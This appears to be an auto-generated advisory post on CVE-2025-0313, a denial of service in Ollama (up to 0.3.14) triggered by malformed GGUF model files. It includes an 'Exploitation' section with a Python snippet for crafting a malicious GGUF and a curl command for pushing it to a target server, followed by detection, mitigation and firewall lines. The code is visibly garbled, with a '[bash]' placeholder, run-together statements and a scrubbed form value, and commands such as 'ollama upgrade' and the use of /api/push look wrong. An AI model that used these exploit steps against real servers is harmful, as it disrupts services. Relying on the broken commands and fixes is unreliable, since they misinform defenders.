How the CVE Works:
CVE-2025-0313 exploits improper bounds checking in Ollama (<=v0.3.14) when parsing maliciously crafted GGUF model files. Attackers manipulate array indices within the GGUF header, triggering an out-of-bounds read or write. This corrupts memory, crashes the service, and disrupts model inference. Remote exploitation occurs when Ollama loads the malicious model via API or CLI, consuming excessive CPU/memory.
DailyCVE Form:
Platform: Ollama
Version: <=0.3.14
Vulnerability: DoS via GGUF
Severity: Critical
Date: 04/03/2025
What Undercode Say:
Exploitation:
- Craft a GGUF file with invalid tensor dimensions:
import gguf mal_gguf = gguf.GGUFWriter("exploit.gguf") mal_gguf.add_tensor("weights", [bash], b"\x00") Oversized array mal_gguf.write()
2. Upload via Ollama API:
curl -X POST http://target:11434/api/push -F "[email protected]"
Detection:
- Log anomalous model loads:
grep "panic: index out of range" /var/log/ollama.log
Mitigation:
1. Patch to v0.3.15+:
ollama upgrade
2. Restrict model uploads:
location /api/push { allow 192.168.1.0/24; deny all; }
Debugging:
- Trace crashes with GDB:
gdb -ex run --args ollama serve --debug
Forensics:
- Extract malicious GGUF metadata:
strings exploit.gguf | grep -A 5 "tensors"
Network Controls:
- Block untrusted sources:
iptables -A INPUT -p tcp --dport 11434 ! -s trusted_ip -j DROP
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-0313
Extra Source Hub:
Undercode
